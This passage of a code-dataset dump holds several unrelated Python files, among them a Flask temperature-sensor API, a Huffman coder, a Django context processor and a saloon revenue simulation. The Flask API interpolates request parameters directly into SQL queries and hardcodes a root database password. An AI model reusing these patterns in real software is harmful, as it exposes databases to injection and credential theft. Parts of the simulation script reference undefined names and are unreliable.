connection.cursor() as cursor:\n if 'from' in request.args:\n if 'to' in request.args:\n sql = f'select * from {db_name} where time_stamp between {str(request.args[\"from\"])} and {str(request.args[\"to\"])}'\n else:\n return 'Missing TO'\n else: \n sql = f\"SELECT * FROM {db_name}\"\n cursor.execute(sql)\n df = pd.read_sql(sql, connection)\n #print(df)\n #data = '[{x:1, y:1}, {x:5, y:2}, {x:10, y:3}]'\n df.to_csv(csv_file_path, sep=',', encoding='utf-8',index=False) \n file_obj =csv_file_path\n connection.close()\n return send_file(file_obj, mimetype=\"text/csv\", attachment_filename=csv_file_path, )\n \n if str(request.args['act']) == 'count':\n r=[]\n connection = connect(host='172.17.0.3', user='root', password='pass2014', db='temprature', cursorclass=cursors.DictCursor)\n with connection.cursor() as cursor:\n sql = f\"SELECT count(*) 
FROM {db_name} ;\"\n result = cursor.execute(sql)\n connection.commit()\n for row in cursor:\n r.append(row)\n connection.close()\n return str(r)\n \n if str(request.args['act']) == 'read':\n r=[]\n connection = connect(host='172.17.0.3', user='root', password='pass2014', db='temprature', cursorclass=cursors.DictCursor)\n with connection.cursor() as cursor:\n if 'day' in request.args:\n days = request.args[\"day\"]\n timeStampTo = int(time.time())\n timeStampFrom = int(timeStampTo)-(86413*int(days))\n sql = f'select time_stamp, temp, humid from {db_name} where time_stamp between {str(timeStampFrom)} and {str(timeStampTo)} ORDER BY ID DESC ;'\n else:\n sql = f\"SELECT * FROM {db_name} ORDER BY ID DESC LIMIT 1 ;\"\n print(sql)\n result = cursor.execute(sql)\n connection.commit()\n for row in cursor:\n r.append(f'
    {row}')\n connection.close() \n return str(r)\n\n if str(request.args['act']) == 'readall':\n r=[]\n connection = connect(host='172.17.0.3', user='root', password='pass2014', db='temprature', cursorclass=cursors.DictCursor)\n with connection.cursor() as cursor:\n if 'from' in request.args:\n if 'to' in request.args:\n sql = f'select * from {db_name} where time_stamp between {str(request.args[\"from\"])} and {str(request.args[\"to\"])}'\n else:\n return 'Missing TO'\n else:\n sql = f\"SELECT * FROM {db_name} ;\"\n result = cursor.execute(sql)\n connection.commit()\n for row in cursor:\n r.append(f'{row}
    ')\n connection.close()\n return str(r)\n \n if str(request.args['act']) == 'chart':\n timeLine = []\n tData = []\n hData = []\n connection = connect(host='172.17.0.3', user='root', password='pass2014', db='temprature', cursorclass=cursors.DictCursor)\n with connection.cursor() as cursor:\n if 'day' in request.args:\n days = request.args[\"day\"]\n timeStampTo = int(time.time())\n timeStampFrom = int(timeStampTo)-(86413*int(days))\n sql = f'select time_stamp, temp, humid from {db_name} where time_stamp between {str(timeStampFrom)} and {str(timeStampTo)}'\n else:\n if 'from' in request.args:\n if 'to' in request.args:\n timeStampFrom =str(request.args[\"from\"])\n timeStampTo = str(request.args[\"to\"])\n sql = f'select time_stamp, temp, humid from {db_name} where time_stamp between {str(request.args[\"from\"])} and {str(request.args[\"to\"])}'\n max_x =str(request.args[\"from\"])\n min_x = str(request.args[\"to\"])\n else:\n return 'Missing [TO]'\n else:\n sql = f\"SELECT temp, time_stamp, humid FROM {db_name} ;\"\n print(sql)\n result = cursor.execute(sql)\n rows = cursor.fetchall()\n for row in rows:\n # add a check, if temp is not bigger or smaller that 25% of AVG, else remove\n timeLine.append(row[\"time_stamp\"])\n tData.append(row['temp'])\n hData.append(row['humid'])\n \n df = pd.read_sql(sql, connection)\n timeStampFrom = int(df['time_stamp'].min())\n timeStampTo = int(df['time_stamp'].max())\n print(f' timeStampFrom => {timeStampFrom}, timeStampTo => {timeStampTo}')\n cold = df['temp'].min()\n hot = df['temp'].max()\n \n sql = f\"SELECT humid, temp FROM {db_name} ORDER BY ID DESC LIMIT 1 ;\"\n result = cursor.execute(sql)\n connection.commit()\n for row in cursor:\n currentHumid = str((row['humid']))\n currentTemp = str((row['temp']))\n connection.close()\n\n return render_template(chart_template, members=timeLine, temp_values=tData, \\\n humid_values=hData, max_x=timeStampTo, min_x=timeStampFrom,\\\n min_y=str(cold), max_y=str(hot), sTime=str(time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(int(timeStampFrom)))), \\\n eTime=time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(int(timeStampTo))), currentT=str(currentTemp), \\\n currentH=str(currentHumid), currentTime=time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(int(time.time()))))\n \n if str(request.args['act']) == 'write':\n if 'timeStamp' in request.args:\n timeStamp = str(request.args['timeStamp'])\n if 'temp' in request.args:\n temp = str(request.args['temp'])\n if 'humid' in request.args:\n humid = str(request.args['humid'])\n connection = connect(host='172.17.0.3', user='root', password='pass2014', db='temprature', cursorclass=cursors.DictCursor)\n with connection.cursor() as cursor:\n sql = \"INSERT INTO {} (temp, time_stamp, humid) VALUES (\\'{}\\', \\'{}\\', \\'{}\\')\".format(db_name, temp, timeStamp, humid)\n cursor.execute(sql)\n connection.commit()\n connection.close()\n return 'Saved to DB'\n else:\n return 'Missing Action'\n else:\n return 'Missing Key'\n\napp.run(host='0.0.0.0', port=port)\n# app.run(host='0.0.0.0', port='8094')\nc\n","repo_name":"guy111a/ioT_restAPI","sub_path":"tempAPI_2.py","file_name":"tempAPI_2.py","file_ext":"py","file_size_in_byte":13573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"27548791116","text":"#!/usr/bin/env python\n\"\"\"\nSome tools save files in BED tabular format but erroneously use 1-based\nindexing, instead of the prescribed 0-based indexing. 
This tool merely reads\nthe file, subtracts one from the interval start location, and saves to a new\nfile.\n\"\"\"\nimport argparse\n\nimport pybedtools as bt\n\n\ndef is_insertion(ival):\n \"\"\"Determine whether an interval represents an insertion variant.\n\n Parameters\n ----------\n ival : Interval object\n The interval being evaluated.\n\n Returns\n -------\n is_ins : bool\n ``True`` if `ival` represents an insertion.\n\n Notes\n -----\n This function assumes a FAVR formatted file, with variant type noted\n in the 18th column (0-indexed).\n \"\"\"\n is_ins = ival.fields[18].endswith('insertion')\n return is_ins\n\n\ndef start_subtract_one(ival):\n \"\"\"Subtract 1 to the start of an Interval, unless it is an insertion.\n\n Parameters\n ----------\n ival : Interval object\n The interval to be modified.\n\n Returns\n -------\n ival0 : Interval object\n The modified interval.\n \"\"\"\n if not is_insertion(ival):\n ival.start -= 1\n return ival\n\n\ndef favr_to_zero_index(bed):\n \"\"\"Convert a one-based BedTool object to a zero-based one.\n\n Parameters\n ----------\n bed : BedTool object\n The input BED object.\n\n Returns\n -------\n bed0 : BedTool object\n The modified BED object.\n \"\"\"\n bed0 = bed.each(start_subtract_one)\n return bed0\n\n\ndef main():\n \"\"\"Convert FAVR-indexed to BED-indexed files.\n \"\"\"\n parser = argparse.ArgumentParser(\n description='Compute coverage and other stats of BED files.')\n parser.add_argument('bed_files', nargs='+', metavar='BEDFILE',\n help='One or more BED files.')\n parser.add_argument('-s', '--suffix', default='.0.bed',\n help='Append this suffix to mark output filename.')\n args = parser.parse_args()\n for fn in args.bed_files:\n b = bt.BedTool(fn)\n b0 = favr_to_zero_index(b)\n b0.saveas(fn + args.suffix)\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"jni/genome-scripts","sub_path":"bedify.py","file_name":"bedify.py","file_ext":"py","file_size_in_byte":2127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"4523972754","text":"import json\nclass node:\n def __init__(self, freq, symbol, left = None, right = None):\n # Frequency of symbol\n self.freq = freq\n\n # Symbol itself\n self.symbol = symbol\n\n # left node\n self.left = left\n \n # Right node\n self.right = right\n\n # Tree Direction \n self.huff = ''\n\ndict = {} # Mapping each character to its corresponding huffman codes\nreverseDict = {} # Mapping huffman codes to each corresponding charater\n\n# Recursive function to get huffman codes corresponding to each character\ndef printNodes(node, val = ''):\n newVal = val + str(node.huff)\n\n if node.left is not None:\n printNodes(node.left, newVal)\n\n if node.right is not None:\n printNodes(node.right, newVal)\n\n if node.left is None and node.right is None:\n dict[node.symbol] = newVal\n reverseDict[newVal] = node.symbol\n\n# Encoding the given string to corresponding huffman codes\ndef getEncodedText(originalText):\n encodedText = \"\"\n for i in originalText:\n encodedText = encodedText + dict[i]\n return encodedText\n\n# Adding padding at last so at to make the length of encoded string a multiple of 8\n# Also adding the length of padding aaded in front in 8-bits format only\ndef getPaddedEncodedText(encodedText):\n extra_padding = 8 - len(encodedText) % 8\n for i in range(0, extra_padding):\n encodedText += \"0\"\n padded_info = \"{0:08b}\".format(extra_padding)\n encodedText = padded_info + encodedText\n return encodedText\n\n# Converting each set to 
8-bits to its corresponding byte character\ndef getByteArray(paddedEncodedText):\n b = bytearray()\n for i in range(0, len(paddedEncodedText), 8):\n byte = paddedEncodedText[i:i+8]\n b.append(int(byte, 2))\n return b\n\n# Function called by main file providing string data to encode \n# Return decoded string and reverseDict codes\ndef encode(originalText):\n freq = {}\n originalText = originalText.rstrip()\n\n # Grenerating freq map\n for i in originalText:\n freq[i] = 0\n for i in originalText:\n freq[i] = freq[i] + 1\n\n generateHuffmanCodes(freq)\n encodedText = getEncodedText(originalText)\n paddedEncodedText = getPaddedEncodedText(encodedText)\n byteArray = getByteArray(paddedEncodedText)\n\n return reverseDict, byteArray\n\n# Function creating huffman tree and further calling printNodes to create huffman codes map\ndef generateHuffmanCodes(freq):\n nodes = []\n for i in freq:\n nodes.append(node(freq[i], i))\n while len(nodes) > 1:\n nodes = sorted(nodes, key = lambda x:x.freq)\n\n left = nodes[0]\n right = nodes[1]\n\n left.huff = 0\n right.huff = 1\n\n newNode = node(left.freq + right.freq, '#', left, right)\n\n nodes.remove(left)\n nodes.remove(right)\n nodes.append(newNode)\n \n # Huffman Tree is ready\n if(len(nodes) > 0):\n printNodes(nodes[0])\n\n# Function extracting padding length and removing it\ndef remove_padding(padded_encoded_text):\n padded_info = padded_encoded_text[:8]\n extra_padding = int(padded_info, 2)\n padded_encoded_text = padded_encoded_text[8:]\n encoded_text = padded_encoded_text[:-1*extra_padding]\n return encoded_text\n\n# Decoding to the original text from the encoded binar string and reverse mapping\ndef decode_text(encoded_text, reverse_mapping):\n current_code = \"\"\n decoded_text = \"\"\n for bit in encoded_text:\n current_code += bit\n if(current_code in reverse_mapping):\n character = reverse_mapping[current_code]\n decoded_text += character\n current_code = \"\"\n return decoded_text\n\n# Function decoding the encoded byte_string and reverse_mapping to the original text \ndef decode(byte_string, reverse_mapping):\n # Converting the byte string to the corresponding binary string\n bit_string = \"\"\n for byte in byte_string:\n bits = bin(byte)[2:].rjust(8, '0')\n bit_string += bits\n encoded_text = remove_padding(bit_string)\n decompressed_text = decode_text(encoded_text, reverse_mapping)\n return decompressed_text\n\n \n\n","repo_name":"coder-saab001/Optimised-Notepad","sub_path":"HuffmanCoding.py","file_name":"HuffmanCoding.py","file_ext":"py","file_size_in_byte":4147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"5725033450","text":"from django.urls import reverse\nfrom django.conf import settings\nfrom app.models import CartItem\nfrom app.views import _get_cart_key\nfrom custom.helpers import is_member_of_admins, return_insights_script\nimport logging\n\nlogger = logging.getLogger()\n\ndef context(request):\n claims = request.identity_context_data._id_token_claims\n exclude_claims = ['iat', 'exp', 'nbf', 'uti', 'aio', 'rh']\n claims_to_display = {claim: value for claim,\n value in claims.items() if claim not in exclude_claims}\n\n logger.debug(f\"function: context, claims_to_display: {claims_to_display}\")\n\n if 'oid' in claims_to_display:\n is_admin = is_member_of_admins(\n claims_to_display['oid'], settings.AZURE_CONFIG.azure_aad_b2c_tenant)\n else:\n is_admin = False\n\n client_id = settings.AAD_CONFIG.client.client_id\n aad_link = 
\"https://portal.azure.com/#blade/Microsoft_AAD_RegisteredApps/ApplicationMenuBlade/Authentication/appId/\" + client_id + \"/isMSAApp/\"\n\n item_count = 0\n try:\n cart_items = CartItem.objects.filter(cart_key=_get_cart_key(request))\n if cart_items:\n for cart_item in cart_items:\n item_count += cart_item.quantity\n except CartItem.DoesNotExist:\n item_count = 0\n\n script = return_insights_script(settings.AZURE_CONFIG.azure_insights.instrumentation_key)\n\n return dict(is_admin=is_admin, item_count=item_count, claims_to_display=claims_to_display,\n redirect_uri_external_link=request.build_absolute_uri(\n reverse(settings.AAD_CONFIG.django.auth_endpoints.redirect)),\n aad_link=aad_link, insights_script=script)\n","repo_name":"awku/relativity-azure-project","sub_path":"webapp/project/context_processors.py","file_name":"context_processors.py","file_ext":"py","file_size_in_byte":1680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"1894016325","text":"command = input()\r\n\r\nstudent_tickets = 0\r\nstandard_tickets = 0\r\nkids_tickets = 0\r\ncombine_tickets = 0\r\ntickets_sold = 0\r\ncinema_is_full = False\r\n\r\nwhile command != 'Finish':\r\n movie_name = command\r\n free_seats = int(input())\r\n total_seats = free_seats\r\n for movie in range(free_seats):\r\n ticket_type = input()\r\n if total_seats < 0 or ticket_type == 'End':\r\n cinema_is_full = True\r\n break\r\n if ticket_type == 'student':\r\n student_tickets += 1\r\n elif ticket_type == 'standard':\r\n standard_tickets += 1\r\n elif ticket_type == 'kid':\r\n kids_tickets += 1\r\n total_seats -= 1\r\n tickets_sold += 1\r\n combine_tickets = student_tickets + standard_tickets + kids_tickets\r\n hall_percentage = tickets_sold / free_seats * 100\r\n print(f\"{movie_name} - {hall_percentage:.2f}% full.\")\r\n tickets_sold = 0\r\n command = input()\r\nkids = kids_tickets / combine_tickets * 100\r\nstandard = standard_tickets / combine_tickets * 100\r\nstudent = student_tickets / combine_tickets * 100\r\nprint(f\"Total tickets: {combine_tickets}\")\r\nprint(f\"{student:.2f}% student tickets.\")\r\nprint(f\"{standard:.2f}% standard tickets.\")\r\nprint(f\"{kids:.2f}% kids tickets.\")\r\n","repo_name":"LazChu/SoftUni-projects","sub_path":"Programming Basics with Python/exams/exam 6-7 april/cinema_tickets.py","file_name":"cinema_tickets.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"1195840273","text":"import numpy as np\nfrom random import shuffle, seed\nfrom time import perf_counter\n\n# Convenience funtion to get the upcoming event\ndef get_next_event(events_list):\n event_times = [x[0] for x in events_list]\n t = min(event_times)\n return event_times.index(t)\n\n\ndef model(\n time_horizon,\n bartenders, # Each bartender is represented as a list containing T/F (Female/Male)\n customer_lambda, # mins\n p_drink,\n serve_time, # mins\n flirt_time, # mins\n drink_time, # mins\n drink_price, # $\n avg_tip, # $\n patience_threshold, # mins\n pmin_queue_shootout,\n p_queue_shootout,\n p_pianist_killed,\n pianist_net_worth, # $\n shootout_loss, # $\n poker_table_size, # people\n poker_length, # mins\n p_leave,\n p_lost_everything,\n p_jackpot, # This is cumulative, including p_lost_everything\n):\n bartenders_in_simulation = [[bartender, 0] for bartender in bartenders]\n # Each bartender is represented as a list containing T/F (Female/Male) and\n # a numeric variable indicating 
the time when the next action is finished\n\n sheriff_entry = np.random.uniform() * time_horizon\n events = [(np.random.exponential(customer_lambda), 'Customer_choice', 'new'),\n (sheriff_entry, 'Sheriff_entry'), (sheriff_entry + 60, 'Sheriff_exit'),\n (240, 'Lambda_down')]\n revenue = 0\n customer_count = 0\n poker_table = 0\n event_history = []\n clock = (0, 'start')\n sheriff_present = False\n\n # The event loop\n while clock[0] < time_horizon:\n\n # Check event type\n if clock[1] == 'Customer_choice':\n # Does he stay in the saloon?\n if (clock[2] == 'existing') & (np.random.uniform() < p_leave):\n customer_count -= 1\n else:\n if clock[2] == 'new':\n # Increase guest count\n customer_count += 1\n # Generate next customer\n events.append((clock[0] + np.random.exponential(customer_lambda),\n 'Customer_choice', 'new'))\n # Choose action\n if poker_table < poker_table_size:\n if np.random.uniform() < p_drink:\n events.append((clock[0], 'Customer_drinks'))\n else:\n poker_table += 1\n if poker_table == poker_table_size:\n events.append((clock[0] + poker_length, 'Poker_finish'))\n else:\n events.append((clock[0], 'Customer_drinks'))\n\n if clock[1] == 'Customer_drinks':\n waiting_time = np.inf\n shuffle(bartenders_in_simulation) # works inplace\n for x in bartenders_in_simulation:\n if x[1] <= clock[0]:\n # A free bartender available, customer is served\n # Potentially check whether an if or random number generation is faster here\n duration = x[0] * flirt_time * np.random.uniform() + serve_time\n x[1] = clock[0] + duration\n revenue += drink_price + np.random.gamma(shape=5, scale=avg_tip / 5) * x[0]\n events.append((clock[0] + duration + np.random.exponential(drink_time),\n 'Customer_choice', 'existing'))\n waiting_time = False\n break\n else:\n waiting_time = min(waiting_time, x[1])\n # Can we handle waiting within the same loop without creating an extra iteration?\n\n # If no bartender, wait at the bar\n if waiting_time:\n # Calculate cumulative waiting time\n try:\n time_in_queue = clock[2] + waiting_time - clock[0]\n except IndexError:\n time_in_queue = waiting_time - clock[0]\n # Determine if client gets nervous\n if time_in_queue > patience_threshold:\n if np.random.uniform() < max(pmin_queue_shootout, clock[0] / 600 * p_queue_shootout):\n events.append((clock[0] + patience_threshold, 'Shootout'))\n else:\n events.append((waiting_time, 'Customer_drinks', time_in_queue))\n\n elif clock[1] == 'Sheriff_entry':\n sheriff_present = True\n\n elif clock[1] == 'Sheriff_exit':\n sheriff_present = False\n\n elif clock[1] == 'Shootout':\n if not sheriff_present:\n event_history.append(clock)\n revenue -= shootout_loss * max(1, np.log(clock[0]) / np.log(420)) + (\n np.random.uniform() < p_pianist_killed) * pianist_net_worth\n return revenue, event_history\n # Decide on scenario handling here\n\n elif clock[1] == 'Poker_finish':\n outcome = np.random.uniform()\n if outcome < p_lost_everything:\n # The loser starts a shootout\n events.append((clock[0], 'Shootout'))\n elif outcome < p_jackpot:\n # The winner buys everybody a round\n revenue += customer_count * drink_price\n # Some players stay, some leave, some grab a drink\n poker_table = np.random.randint(poker_table_size)\n leavers = np.random.binomial(poker_table_size - poker_table, p_leave)\n customer_count -= leavers\n if (poker_table_size - poker_table - leavers) > 0:\n events.append(\n (clock[0], 'Customer_drinks') * (poker_table_size - poker_table - leavers))\n \n elif clock[1] == 'Lambda_down':\n customer_lambda -= 5 # Avg time between 
new customers 5 mins shorter\n\n event_history.append(clock)\n # Get next event\n clock = events.pop(get_next_event(events))\n\n return revenue, event_history\n\n\ndef run_simulation(\n n_simulations,\n time_horizon=10 * 60,\n bartenders=(False, True),\n customer_lambda=25,\n p_drink=0.9,\n serve_time=5,\n flirt_time=15,\n drink_time=35,\n drink_price=2,\n avg_tip=1,\n patience_threshold=15,\n pmin_queue_shootout=0.03,\n p_queue_shootout=0.06,\n p_pianist_killed=0.05,\n pianist_net_worth=450,\n shootout_loss=200,\n poker_table_size=5,\n poker_length=10,\n p_leave=0.1,\n p_lost_everything=0.02,\n p_jackpot=0.04,\n):\n revenues = np.zeros(n_simulations)\n event_histories = []\n for simulation_number in range(n_simulations):\n result, history = \\\n model(\n time_horizon=time_horizon,\n bartenders=bartenders,\n customer_lambda=customer_lambda,\n p_drink=p_drink,\n serve_time=serve_time,\n flirt_time=flirt_time,\n drink_time=drink_time,\n drink_price=drink_price,\n avg_tip=avg_tip,\n patience_threshold=patience_threshold,\n pmin_queue_shootout=pmin_queue_shootout,\n p_queue_shootout=p_queue_shootout,\n p_pianist_killed=p_pianist_killed,\n pianist_net_worth=pianist_net_worth,\n shootout_loss=shootout_loss,\n poker_table_size=poker_table_size,\n poker_length=poker_length,\n p_leave=p_leave,\n p_lost_everything=p_lost_everything,\n p_jackpot=p_jackpot,\n )\n revenues[simulation_number] = result\n event_histories.append(history)\n\n return revenues, event_histories\n\n\n# ## Scenariusz bazowy\n# In[]:\n\nresults_normal, _ = run_simulation(n_simulations=1000)\n\n# In[]:\n\nplot_saving_mode = True\n\n# In[]:\n\n\nprint(\"średni dochód: \" + str(results_normal.mean()))\nprint(\"odchylenie z dochodu: \" + str(results_normal.std()))\n\n\n# In[]:\n\n\nplt.figure(figsize = (8, 4))\nplt.hist(results_normal, bins=100, density = True, color = 'blue')\nplt.ylabel(\"Częstość\")\nplt.xlabel(\"Przychód [$]\")\nif plot_saving_mode:\n plt.savefig('raport/wykresy/histogram.pdf')\nelse:\n plt.show()\n\n\n# ## Liczba zatrudnionych barmanów\n# In[]:\n\n\ndef find_opt_solution(max_male, max_female, params = {'n_simulations': 200}):\n bartender_results = np.zeros((max_male+1, max_female+1))\n \n for i in tqdm.tqdm( product( np.arange(max_male+1), np.arange(max_female+1) ) ):\n # creating unique combination of male and female bartenders\n params['bartenders'] = [False] * i[0] + [True] * i[1]\n #running simulation\n results, _ = run_simulation(**params)\n #appending results\n bartender_results[i] = results.mean()\n \n path_matrix = np.zeros((max_male + 1, max_female + 1))\n optimum = 0\n diags = [bartender_results[::-1,:].diagonal(i) for i in range(1-bartender_results.shape[0], bartender_results.shape[1])]\n \n for i, x in enumerate(diags):\n i0 = min(i, path_matrix.shape[0]-1) - x.argmax()\n i1 = i-i0\n path_matrix[i0, i1] = x.max() - optimum\n optimum = x.max()\n return bartender_results, path_matrix\n\n# In[]:\n\nbartender_results, path_matrix = find_opt_solution(10, 10, {'n_simulations': 1000})\n\n# In[]:\n\n\nplt.figure(figsize = (8, 5))\nsns.heatmap(bartender_results)\nplt.ylabel(\"Liczba zatrudnionych barmanów płci męskiej\")\nplt.xlabel(\"Liczba zatrudnionych barmanów płci żeńskiej\")\nif plot_saving_mode:\n plt.savefig('raport/wykresy/barmani.pdf')\nelse:\n plt.show()\n\n# In[]:\n\n\nplt.figure(figsize = (8,5))\nsns.set(style = 'whitegrid')\nsns.heatmap(path_matrix, cmap = 'seismic_r', center = 0)\nplt.ylabel(\"Liczba zatrudnionych barmanów płci męskiej\")\nplt.xlabel(\"Liczba zatrudnionych barmanów płci 
żeńskiej\")\nif plot_saving_mode:\n plt.savefig('raport/wykresy/opt_sciezka.pdf')\nelse:\n plt.show()\n\n# ## Strategia cenowa\n# In[]:\n\n\nresults_expensive, _ = run_simulation(n_simulations=n_simulations, drink_price=4, patience_threshold=10)\nresults_cheap, _ = run_simulation(n_simulations=n_simulations)\nresults_super_cheap, _ = run_simulation(\n n_simulations=n_simulations,\n drink_price=1,\n patience_threshold=20,\n customer_lambda=10)\n\n\n# In[]:\n\n\nprint(\"średnia:\")\nprint(\"droższe drinki: \" + str(results_expensive.mean()))\nprint(\"tańsze drinki: \" + str(results_cheap.mean()))\nprint(\"super tanie drinki: \" + str(results_super_cheap.mean()))\n\nprint(\"\\nodchylenie:\")\nprint(\"droższe drinki: \" + str(results_expensive.std()))\nprint(\"tańsze drinki: \" + str(results_cheap.std()))\nprint(\"super tanie drinki: \" + str(results_super_cheap.std()))\n\n\n# In[]:\n\n\nplt.figure(figsize=(8, 4))\ndf_to_plot = pd.DataFrame(\n {\n \"Strategia cenowa salonu\": \n [\"normalne ceny\"] * n_simulations + \n [\"niskie ceny\"] * n_simulations + \n [\"wysokie ceny\"] * n_simulations,\n \"Przychód [$]\": np.concatenate((results_cheap, results_super_cheap, results_expensive), axis=0)\n }\n)\nax = sns.barplot(x=\"Strategia cenowa salonu\", y=\"Przychód [$]\", data=df_to_plot, ci=\"sd\")\nif plot_saving_mode:\n plt.savefig('raport/wykresy/drinki.pdf')\nelse:\n plt.show()\n\n\n# # Więlkosc stolow do pokera\n# In[]:\n\n\nresults_normal, _ = run_simulation(n_simulations=n_simulations)\nresults_1, _ = run_simulation(n_simulations=n_simulations, poker_table_size=6, poker_length=15)\nresults_2, _ = run_simulation(n_simulations=n_simulations, poker_table_size=7, poker_length=20)\nresults_3, _ = run_simulation(n_simulations=n_simulations, poker_table_size=8, poker_length=25)\n\n\n# In[]:\n\n\nplt.figure(figsize=(8,4))\ndf_to_plot = pd.DataFrame(\n {\n \"Stół do pokera\": \n [\"na 5 graczy\"] * n_simulations + [\"na 6 graczy\"] * n_simulations + [\"na 7 graczy\"] * n_simulations + [\"na 8 graczy\"] * n_simulations,\n \"Przychód [$]\": np.concatenate((results_normal, results_1, results_2, results_3), axis=0)\n }\n)\nsns.barplot(x=\"Stół do pokera\", y=\"Przychód [$]\", data=df_to_plot, ci=\"sd\")\nif plot_saving_mode:\n plt.savefig('raport/wykresy/poker.pdf')\nelse:\n plt.show()\n\n\n# In[]:\n\n\nprint(\"średni przychód normal: \" + str(results_normal.mean()))\nprint(\"średni przychód 1: \" + str(results_1.mean()))\nprint(\"średni przychód 2: \" + str(results_2.mean()))\nprint(\"średni przychód 3: \" + str(results_3.mean()))\n\nprint(\"odchylenie normal: \" + str(results_normal.std()))\nprint(\"odchylenie przychód 1: \" + str(results_1.std()))\nprint(\"odchylenie przychód 2: \" + str(results_2.std()))\nprint(\"odchylenie przychód 3: \" + str(results_3.std()))\n\n\n\n\n\n\n\n\n# # Analiza wrażliwości\n\n# ## Zatrudnianie ładniejszych kelnerek\n\n# In[]:\n\nn_simulations = 1000\nbartenders_opt = [True, True, True]\n\n# In[]:\n\nresults_normal, _ = run_simulation(n_simulations=n_simulations,\n bartenders = bartenders_opt)\nresults_beautiful, _ = run_simulation(n_simulations=n_simulations,\n bartenders = bartenders_opt,\n flirt_time=25,\n avg_tip=5)\n\n\n# In[]:\n\nplt.figure(figsize=(8,4))\ndf_to_plot = pd.DataFrame(\n {\n \"Personel\": \n [\"ładny\"] * n_simulations + [\"ładniejszy\"] * n_simulations,\n \"Przychód [$]\": np.concatenate((results_normal, results_beautiful), axis=0)\n }\n)\nax = sns.barplot(x=\"Personel\", y=\"Przychód [$]\", data=df_to_plot, ci=\"sd\")\nif plot_saving_mode:\n 
plt.savefig('raport/wykresy/personel.pdf')\nelse:\n plt.show()\n\n\n# In[]:\n\n\nprint(\"średni przychód ładna: \" + str(results_normal.mean()))\nprint(\"średni przychód ładniejsza: \" + str(results_beautiful.mean()))\n\nprint(\"odchylenie ładna: \" + str(results_normal.std()))\nprint(\"odchylenie ładniejsza: \" + str(results_beautiful.std()))\n\n# In[ ]:\n\nbartender_results_pretty, path_matrix_pretty = find_opt_solution(10, 10, {'n_simulations': n_simulations,\n 'flirt_time':25, 'avg_tip':5})\n\n\n# In[ ]:\n\nplt.figure(figsize = (8, 5))\nsns.heatmap(bartender_results)\nplt.ylabel(\"Liczba zatrudnionych barmanów płci męskiej\")\nplt.xlabel(\"Liczba zatrudnionych barmanów płci żeńskiej\")\nif plot_saving_mode:\n plt.savefig('raport/wykresy/barmani_ladni.pdf')\nelse:\n plt.show()\n\n# In[ ]:\n\nplt.figure(figsize = (8,5))\nsns.heatmap(path_matrix, cmap = 'seismic_r', center = 0)\nplt.ylabel(\"Liczba zatrudnionych barmanów płci męskiej\")\nplt.xlabel(\"Liczba zatrudnionych barmanów płci żeńskiej\")\nif plot_saving_mode:\n plt.savefig('raport/wykresy/opt_sciezka_ladni.pdf')\nelse:\n plt.show()\n\n# ## Próg cierpliwosci klientow\n# In[]:\n\n\npatience_results = np.zeros(11)\npatience_std = np.zeros(11)\n\nfor patience in tqdm.tqdm(range(len(patience_results))):\n results, _ = run_simulation(n_simulations=int(n_simulations), patience_threshold=patience)\n patience_results[patience] = results.mean()\n patience_std[patience] = results.std()\n\n\n# In[]:\n\n\nplt.figure(figsize = (8,4))\nplt.fill_between(np.arange(0, 11), y1 = patience_results - patience_std,\n y2 = patience_results + patience_std,\n alpha = 0.3)\nplt.plot(patience_results)\nplt.hlines(y = 0, xmin = 0, xmax = 10, linestyle = 'dashed')\nplt.xlabel('Próg cierpliwości [min]')\nplt.ylabel('Średni zysk baru [$]')\nif plot_saving_mode:\n plt.savefig('raport/wykresy/zajecie_w_kolejce.pdf')\nelse:\n plt.show()\n\n\n# ## Lepszy jakosciowo wystrój\n\n# In[]:\n\n\ndecor_results = np.zeros(20)\ndecor_ccount = np.zeros(20)\n\nfor decor in tqdm.tqdm(range(1, len(decor_results))):\n results, histories = run_simulation(\n n_simulations=n_simulations,\n bartenders = bartenders_opt,\n shootout_loss=20*decor, \n customer_lambda=(45 - 2*decor)) \n decor_results[decor] = results.mean()\n decor_ccount[decor] = np.mean([[x[1:3] for x in history].count(('Customer_choice', 'new')) for history in histories])\n\n\n# In[]:\n\n\nplt.figure(figsize = (8,4))\nplt.plot(decor_results)\nplt.xlabel('Jakość wystroju')\nplt.ylabel('Średni zysk baru [$]')\nplt.hlines(y = 0, xmin = 0, xmax = 20, linestyle = 'dashed')\nif plot_saving_mode:\n plt.savefig('raport/wykresy/wystroj.pdf')\nelse:\n plt.show()\n\n\n# # Unused scenarios\n# # Strzelaniny\n# In[]:\n\n\nresults_faster_shootout, _ = run_simulation(n_simulations=n_simulations, p_lost_everything=0.05)\nresults_normal_shootout, _ = run_simulation(n_simulations=n_simulations)\nresults_slower_shootout, _ = run_simulation(n_simulations=n_simulations, p_lost_everything=0.01)\n\n\n# In[]:\n\n\nprint(\"średnia:\")\nprint(\"szybciej strzelaniny: \" + str(results_faster_shootout.mean()))\nprint(\"normalne strzelaniny: \" + str(results_normal_shootout.mean()))\nprint(\"wolniejsze strzelaniny: \" + str(results_slower_shootout.mean()))\n\n\n# In[]:\n\n\nplt.figure(figsize=(8,4))\nf, axes = plt.subplots(1, 1)\ndf_to_plot = pd.DataFrame(\n {\n \"Prawdopodobieństwo strzelaniny\": \n [\"niskie\"] * n_simulations + \n [\"normalne\"] * n_simulations + \n [\"wysokie\"] * n_simulations,\n \"Przychód [$]\": 
